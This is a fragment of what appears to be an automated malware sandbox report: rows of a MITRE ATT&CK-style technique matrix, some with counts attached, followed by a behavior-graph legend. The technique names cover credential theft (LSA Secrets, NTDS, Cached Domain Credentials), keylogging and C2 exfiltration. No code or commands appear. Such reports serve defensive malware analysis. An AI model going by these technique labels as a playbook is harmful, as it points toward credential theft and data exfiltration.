Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 121 | NTDS | System Information Discovery 25 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Screenshots